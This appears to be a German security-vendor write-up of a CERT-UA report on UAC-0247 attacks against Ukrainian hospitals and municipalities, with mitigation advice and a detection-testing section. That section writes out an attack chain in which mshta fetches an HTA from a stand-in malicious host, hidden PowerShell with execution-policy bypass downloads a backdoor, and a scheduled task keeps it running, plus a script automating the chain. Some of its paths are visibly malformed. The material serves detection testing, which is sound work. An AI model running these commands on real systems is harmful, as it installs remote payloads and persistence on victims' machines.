UAC-0247 Zielt auf Krankenhäuser, Kommunalverwaltungen und FPV-Betreiber ab

Zusammenfassung

Zwischen März und April 2026 verzeichnete CERT-UA einen Anstieg von Cyberangriffen auf ukrainische Krankenhäuser, kommunale Behörden und FPV-Betreibergruppen. Die Aktivitäten beruhen auf Phishing-E-Mails mit schädlichen HTA- oder HTML-Links, die benutzerdefinierte Loader, die RAVENSHELL Reverse Shell und das C#-basierte AGINGFLY Remote-Access-Tool übermitteln. Weitere Nutzdaten umfassen die SILENTLOOP PowerShell-Hintertür, die CHROMELEVATOR- und ZAPIXDESK-Anmeldeinformationsdiebe und den öffentlich verfügbaren Scanner RUSTSCAN. Die Angreifer nutzen zudem DLL-Sideloading, geplante Aufgaben und eine breite Palette benutzerdefinierter Command-and-Control-Infrastrukturen.

Untersuchung

CERT-UA überprüfte dutzende Vorfälle und extrahierte Indikatoren für Kompromittierungen, darunter schädliche ausführbare Dateien, Skripte, geplante Aufgaben, IP-Adressen und Domains. Die Untersuchung deckte einen zweistufigen Loader, eine mit XOR-Verschlüsselung geschützte reverse TCP-Shell und einen auf WebSocket basierenden C2-Kanal auf, der auf einem statischen AES-CBC-Schlüssel beruht. Die Analysten dokumentierten auch den Missbrauch legitimer Windows-Dienstprogramme wie mshta.exe, powershell.exeund wscript.exe zum Starten der schädlichen HTA-Dateien.

Abschwächung

Der Bericht empfiehlt, die Ausführung von LNK-, HTA- und JavaScript-Dateien, die per E-Mail zugestellt werden, zu deaktivieren, die Nutzung von mshta.exe, powershell.exeund wscript.exeeinzuschränken und eine Applikations-Whitelist durchzusetzen. Verteidiger werden auch ermutigt, auf verdächtige Erstellung von geplanten Aufgaben und ausgehende Verbindungen zu den identifizierten Command-and-Control-Servern zu überwachen.

Reaktion

Sicherheitsteams sollten bekannte bösartige URLs und IP-Adressen umgehend blockieren, nach den aufgeführten Dateinamen und geplanten Aufgaben auf Endgeräten suchen und kompromittierte Systeme isolieren. Es sollten Erkennungsregeln für die beobachteten Befehlszeilen bereitgestellt werden, mit zusätzlichem Monitoring für AGINGFLY-bezogenen WebSocket-Verkehr. Betroffene Konten sollten sofortige Passwortzurücksetzungen durchlaufen.

Simulationsausführung

Voraussetzung: Der Telemetrie- & Basislinien-Vorflug-Check muss bestanden haben.

Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der gegnerischen Technik (TTP), die zur Aktivierung der Erkennungsregel entwickelt wurde. Die Befehle und die Erzählung MÜSSEN direkt die identifizierten TTPs widerspiegeln und versuchen, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird.

• Angriffserzählung & Befehle:

  Ein Angreifer hat sich einen ersten Zugang zu einer kompromittierten Workstation verschafft. Um die Persistenz aufrechtzuerhalten und weitere Nutzdaten auszuführen, während er klassische AV umgeht, nutzt der Angreifer:

  1. Verwendet mshta.exe zum Herunterladen und Ausführen einer bösartigen HTA-Datei, die eine PowerShell-One-Liner enthält.
  2. Der PowerShell-One-Liner lädt eine Hintertür-Binärdatei von einem Remote-Server herunter und speichert sie in %TEMP%.
  3. Erstellt eine geplante Aufgabe (schtasks /Create /SC MINUTE /MO 10die die Hintertür alle zehn Minuten ausführt und so eine kontinuierliche Ausführung auch nach einem Neustart sicherstellt.

  Die genauen Befehle, die auf dem kompromittierten Host ausgeführt werden, sind:

  :: Schritt 1 – mshta herunterladen & starten
  mshta.exe "http://bösartig.beispiel.com/nutzlast.hta"
  
  :: Schritt 2 – PowerShell eingebettet in die HTA (hier direkt simuliert)
  powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden ^
    -Command "(New-Object System.Net.WebClient).DownloadFile('http://bösartig.beispiel.com/hintertür.exe',$env:TEMP+'hintertür.exe')"
  
  :: Schritt 3 – Geplante Aufgabe für Persistenz
  schtasks /Create /SC MINUTE /MO 10 /TN "Updater" /TR "%TEMP%hintertür.exe"

• Regressionstest-Skript: Das folgende PowerShell-Skript automatisiert die gesamte Angriffskette und reproduziert die genaue Telemetrie, die erforderlich ist, damit die Regel anschlägt.

  #================================================================
  # Regressionstest – Sigma-Regel für mshta + PowerShell + schtasks auslösen
  #================================================================
  
  # 1. URLs und Pfade definieren (benutzen Sie Test-Server im Labor)
  $htaUrl       = "http://127.0.0.1:8080/nutzlast.hta"
  $payloadUrl   = "http://127.0.0.1:8080/hintertür.exe"
  $tempPath     = "$env:TEMPhintertür.exe"
  $taskName     = "Updater"
  
  # 2. mshta-Ausführung simulieren (lädt das HTA – hier rufen wir einfach mshta auf)
  Write-Host "[*] Führe mshta.exe aus"
  Start-Process -FilePath "mshta.exe" -ArgumentList "`"$htaUrl`"" -NoNewWindow -Wait
  
  # 3. PowerShell-One-Liner ausführen, um die Hintertür herunterzuladen
  Write-Host "[*] Hintertür über PowerShell herunterladen"
  $psCmd = "(New-Object System.Net.WebClient).DownloadFile('$payloadUrl','$tempPath')"
  Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command `$psCmd`" -NoNewWindow -Wait
  
  # 4. Geplante Aufgabe erstellen (10-Minuten-Intervall)
  Write-Host "[*] Geplante Aufgabe für Persistenz erstellen"
  $schtasksArgs = "/Create /SC MINUTE /MO 10 /TN `"$taskName`" /TR `"$tempPath`" /F"
  Start-Process -FilePath "schtasks.exe" -ArgumentList $schtasksArgs -NoNewWindow -Wait
  
  Write-Host "[+] Angriffssimulation abgeschlossen. Überprüfen Sie das SIEM auf den Alarm."

• Bereinigungskommandos: Nach der Validierung entfernen Sie die erstellten Artefakte, um den Host in einen sauberen Zustand zurückzusetzen.

  # Geplante Aufgabe löschen
  schtasks /Delete /TN "Updater" /F
  
  # Hintertür-Binärdatei entfernen
  Remove-Item -Path "$env:TEMPhintertür.exe" -Force
  
  # (Optional) Alle Test-HTA-Dateien löschen, falls diese lokal gespeichert wurden
  # Remove-Item -Path "$env:TEMPnutzlast.hta" -Force